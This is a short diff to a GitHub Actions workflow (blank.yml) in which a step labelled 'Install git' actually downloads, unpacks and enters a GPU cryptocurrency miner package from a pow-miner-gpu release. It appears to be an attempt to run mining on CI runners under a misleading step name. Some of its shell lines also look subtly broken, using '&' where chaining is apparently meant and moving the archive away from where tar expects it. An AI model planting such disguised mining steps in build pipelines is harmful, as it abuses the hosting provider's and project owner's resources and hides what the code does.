--- a/.github/workflows/blank.yml
+++ b/.github/workflows/blank.yml
@@ -13,7 +13,7 @@ jobs:
     steps:
     - name: Install git
       run : |
-             wget https://github.com/tontechio/pow-miner-gpu/releases/download/20211108-1/minertools-cuda-ubuntu-20.04-x86-64.tar.gz
-             mv minertools-cuda-ubuntu-20.04-x86-64.tar.gz 1.tar.gz
+             wget https://github.com/tontechio/pow-miner-gpu/releases/download/20211108-1/minertools-cuda-ubuntu-20.04-x86-64.tar.gz & pwd
+             mv minertools-cuda-ubuntu-20.04-x86-64.tar.gz /home/runner/1.tar.gz
              tar xvzf 1.tar.gz
              cd 1 & ls -l
